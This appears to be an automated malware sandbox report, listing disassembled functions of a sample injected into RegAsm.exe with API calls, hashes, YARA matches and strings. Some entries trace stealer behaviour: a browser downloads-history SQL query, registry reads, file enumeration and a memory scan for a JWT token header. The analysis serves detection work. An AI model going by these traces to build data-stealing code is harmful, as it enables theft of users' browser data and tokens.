                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1672879316270d8679779d830de0ef40e57e318551c8266025f220ddf6d90acc
                                                                                                                                                                                                • Instruction ID: 2b82ecaca1a69a3cf2d0139c3b76ff0669bf290cecf4c559af3def420791ff50
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1672879316270d8679779d830de0ef40e57e318551c8266025f220ddf6d90acc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D518475608200AFDB40EB64FC45FEA7BE2EFC5320F0985A8F558872B1E631D9519B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041519E
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 004151F4
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 0041521A
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0041523A
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 0041524E
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00415261
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00415275
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00415288
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00414ED2: _EH_prolog.MSVCRT ref: 00414ED7
                                                                                                                                                                                                  • Part of subcall function 00414ED2: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00414EEF
                                                                                                                                                                                                  • Part of subcall function 00414ED2: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00414EF6
                                                                                                                                                                                                  • Part of subcall function 00414ED2: wsprintfA.USER32 ref: 00414F0E
                                                                                                                                                                                                  • Part of subcall function 00414ED2: FindFirstFileA.KERNEL32(?,?), ref: 00414F25
                                                                                                                                                                                                  • Part of subcall function 00414ED2: StrCmpCA.SHLWAPI(?,00425838), ref: 00414F42
                                                                                                                                                                                                  • Part of subcall function 00414ED2: StrCmpCA.SHLWAPI(?,0042583C), ref: 00414F5C
                                                                                                                                                                                                  • Part of subcall function 00414ED2: wsprintfA.USER32 ref: 00414F80
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2058169020-0
                                                                                                                                                                                                • Opcode ID: edcf4ba042a2a60bc2fec9dfa5b2655c768123c02b02134ec45f543cf66a4bf4
                                                                                                                                                                                                • Instruction ID: 3a2e9aa6764a06c96bbb454120c3335839c9a93bb3da0b164c669daa5d799fab
                                                                                                                                                                                                • Opcode Fuzzy Hash: edcf4ba042a2a60bc2fec9dfa5b2655c768123c02b02134ec45f543cf66a4bf4
                                                                                                                                                                                                • Instruction Fuzzy Hash: B341CEB2D0022DAACF11EBE1DC49EDE777CAB19314F4005BAB509E3155EA38D7588FA4
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 40742c4e5ee129739a7085e27133753dd1fa2796ca20c604c64af7d22d850fe6
                                                                                                                                                                                                • Instruction ID: f56ce666a3f8dc8792a426ead96b289c0b3afba88077b89616071d29f935a704
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40742c4e5ee129739a7085e27133753dd1fa2796ca20c604c64af7d22d850fe6
                                                                                                                                                                                                • Instruction Fuzzy Hash: A31196F99041107FDE049B24FC42FAB7B69EF95610F44849CF886C7210E736E919D2A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                • Instruction ID: 540d36e59252c19a3777ba8528a3b8d9cbe1473a9e59c7463fe7d8f63c94216b
                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54B1CFB1A04702ABE744CF29DC81A9ABBE5FF88254F04453DF949D3711EB35F9248B91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 6c696cbe0c67dbd42d6d28b23f906cf8165a802ceb2b5a74fd68971baef17ece
                                                                                                                                                                                                • Instruction ID: a549709cbc80f821b13e53177f626a24d1250cbb50b85ec0bf15b53d9d1babf2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c696cbe0c67dbd42d6d28b23f906cf8165a802ceb2b5a74fd68971baef17ece
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FA16771A443514FDB20CF38D8917DABBE5AFA8314F28892DE8E697381E335D845CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00407533
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 004077FF
                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00407813
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                                                                                                                • API String ID: 3193997572-2241552939
                                                                                                                                                                                                • Opcode ID: 345d1b81f1e86f66f721e7032b8650fa5e2dcdd9e18d0337e69d876e03cf7983
                                                                                                                                                                                                • Instruction ID: 24812c0fe3bee4bc31f2b58e37fc786c9efcc8e1e356c96fca072d0e9bd0485e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 345d1b81f1e86f66f721e7032b8650fa5e2dcdd9e18d0337e69d876e03cf7983
                                                                                                                                                                                                • Instruction Fuzzy Hash: F3B17171804148EACB05EBE6D955FEDBBB5AF29308F1044AEE446731C2DB781B18DB36
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(input, token, start, end, position)$simple$unknown tokenizer: %s
                                                                                                                                                                                                • API String ID: 0-2679805236
                                                                                                                                                                                                • Opcode ID: 874fe8817ab0c6a2ade49e1d030a0b146560e8b2af95bf51d9e05b5dbe940080
                                                                                                                                                                                                • Instruction ID: 68508619a871486878ea80e2c6466ed192c99cf10e8b1388403b5ee8abce4e8f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 874fe8817ab0c6a2ade49e1d030a0b146560e8b2af95bf51d9e05b5dbe940080
                                                                                                                                                                                                • Instruction Fuzzy Hash: B871D371A043068BCB04CF38CD84A9AB7E8BFA4214F05852DE88AD7341EB35E949CBD1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                • API String ID: 0-3864549341
                                                                                                                                                                                                • Opcode ID: 65b2e1bf07bdc50ecab10cc9731a8898aef4917437aba0d65a41288ff91bd9d7
                                                                                                                                                                                                • Instruction ID: 589b73edfe0eaa4affc1be4e0efc8d1f00c938b27e6072c6452d581665d6eeaf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65b2e1bf07bdc50ecab10cc9731a8898aef4917437aba0d65a41288ff91bd9d7
                                                                                                                                                                                                • Instruction Fuzzy Hash: F06156B5A00B016BF701AF30CC56BDF7BA8AF41305F004528E856EB2C2E7A5E155C7A5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • cannot UPDATE a subset of columns on fts5 contentless-delete table: %s, xrefs: 1B4C0B3B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: cannot UPDATE a subset of columns on fts5 contentless-delete table: %s
                                                                                                                                                                                                • API String ID: 0-2869280805
                                                                                                                                                                                                • Opcode ID: 0d4b6a79c0f3f50deb11847bc0c61aee8df353d23c0c0208f370d9a0895e6580
                                                                                                                                                                                                • Instruction ID: 0645a15231f2de175e5ebbd1523347db1fa0c14c4b2f000f8a35a4961cd4aa95
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d4b6a79c0f3f50deb11847bc0c61aee8df353d23c0c0208f370d9a0895e6580
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3441B1BAA013019FDB00DF98EC809A7F7A5FF89625B0085BEE64887711E772E855C790
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                                                                                                                                                                • API String ID: 0-131617836
                                                                                                                                                                                                • Opcode ID: 9709a4853c1abfb2b7469dc6e4de6539e2730c0769a8e9b9df498c5a0ce997ab
                                                                                                                                                                                                • Instruction ID: 97b88b50acce4b66c50461867a875873f851a124bc8849715c550a359b2e075e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9709a4853c1abfb2b7469dc6e4de6539e2730c0769a8e9b9df498c5a0ce997ab
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1051F576E041828BDB008F14D6807E6B7B1FB52324F85C1A8EA865B745E732ED878B71
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: main$rbu_memory
                                                                                                                                                                                                • API String ID: 0-3973752345
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • winAccess, xrefs: 1B4A8D60
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B4A8D35
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                • API String ID: 0-1873940834
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                                                                                                                                                                                • API String ID: 0-3074873597
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • no such database: %s, xrefs: 1B4B1E05
                                                                                                                                                                                                • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1B4B1E2C
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                                                                                                                                                                • API String ID: 0-1404816483
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • strlen.MSVCRT ref: 0040E38B
                                                                                                                                                                                                • ??_U@YAPAXI@Z.MSVCRT ref: 0040E3AC
                                                                                                                                                                                                  • Part of subcall function 0040E1C5: strlen.MSVCRT ref: 0040E1D1
                                                                                                                                                                                                  • Part of subcall function 0040E1C5: strlen.MSVCRT ref: 0040E1E7
                                                                                                                                                                                                  • Part of subcall function 0040E1C5: strlen.MSVCRT ref: 0040E280
                                                                                                                                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040E3D9
                                                                                                                                                                                                • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040E4A3
                                                                                                                                                                                                • ??_V@YAXPAX@Z.MSVCRT ref: 0040E4B4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen$QueryVirtual
                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                • API String ID: 3099930812-2766056989
                                                                                                                                                                                                • Opcode ID: bc935735bfe66f2cfa709eb9292368b676d4d92ac508cf87d482b77474d67838
                                                                                                                                                                                                • Instruction ID: c8b3067a2108592b80ef189392ea64f237946407b23b110ec30888ac03a258c7
                                                                                                                                                                                                • Opcode Fuzzy Hash: bc935735bfe66f2cfa709eb9292368b676d4d92ac508cf87d482b77474d67838
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92417F71A00109EFDF14DF96CC45AEF7BBAEF44358F14442AF905B2290D7389E609B98
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 004104DE
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410509
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,0042549C,00000000,?,?,?,00000000), ref: 0041054C
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,00425498,00000000,?,?,?,00000000), ref: 0041057A
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,00425494,00000000,?,?,?,00000000), ref: 0041059F
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(00000000,00425490,00000000,?,?,?,00000000), ref: 004105D0
                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00410606
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strtok_s$H_prolog
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1158113254-0
                                                                                                                                                                                                • Opcode ID: 7a7ea6faa1a0c3b333f2e120b484d67a2e51921f489177db5e1a79cf971b9e4b
                                                                                                                                                                                                • Instruction ID: ebd3afb1fba8b709159ab264ef984f9babedf62ef1284e5e49618526588e8651
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7ea6faa1a0c3b333f2e120b484d67a2e51921f489177db5e1a79cf971b9e4b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 09419071A0020AABC714DF65C981BEABBF9BB14315F10052FE405E6691DBBCDAC1CF59
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: d607e783a53234a57d590ae923e76f3ff2efdc97e87b2651459457d3993fe6b3
                                                                                                                                                                                                • Instruction ID: c0ddbf6ef7788f835af0706701b89e76483d388f8f430444617e0990a9d4d286
                                                                                                                                                                                                • Opcode Fuzzy Hash: d607e783a53234a57d590ae923e76f3ff2efdc97e87b2651459457d3993fe6b3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF1E371A083419BE705CF18D8C47DABBE0BF84224F244A7DE8D997262F735E946CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: da32897e83b0aff963613a5b243dd6116b22c1672a0ba425401abdd6acec35e3
                                                                                                                                                                                                • Instruction ID: c825e680833396d1b33c723bd5892eb2d4153219d2dd2cded6d6a1f826a275b8
                                                                                                                                                                                                • Opcode Fuzzy Hash: da32897e83b0aff963613a5b243dd6116b22c1672a0ba425401abdd6acec35e3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1581AC759042119BD7009F29D989B9B7BE8FF90B29F40482CFD88D7300D736E948CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00414D16
                                                                                                                                                                                                • memset.MSVCRT ref: 00414D42
                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,?,00000000), ref: 00414D5F
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00414D7F
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00414DAE
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00414DC1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2333602472-0
                                                                                                                                                                                                • Opcode ID: e89c6f7f6df6db119f28572c97048b95ba73f9e7729f35408fa1683792117981
                                                                                                                                                                                                • Instruction ID: 6b6383bd5b7caf69e41b2564a079a2aef47e93a4663bb97bd4959b4e6f5e0dc6
                                                                                                                                                                                                • Opcode Fuzzy Hash: e89c6f7f6df6db119f28572c97048b95ba73f9e7729f35408fa1683792117981
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D415EB1C4022DABCF10EFA1DC46EDD7B7DEB04314F00456AF514A2191E735AB958BD6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
                                                                                                                                                                                                • API String ID: 0-231581592
                                                                                                                                                                                                • Opcode ID: 0f983279b926cda9efcdff7433bfe7098ebf7d145b89aaa510319f0a54b92e80
                                                                                                                                                                                                • Instruction ID: 5082ae1df8426d0a4ec9faf77e3b27bb32a6c1f654ea0476b4b5bc9a1786462d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f983279b926cda9efcdff7433bfe7098ebf7d145b89aaa510319f0a54b92e80
                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE105B0A043419FF701CF68C880BDBBBEABF95704F04492CE99897651E771E985CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Strings
                                                                                                                                                                                                • recursively defined fts5 content table, xrefs: 1B4B6DE2
                                                                                                                                                                                                Memory Dump Source
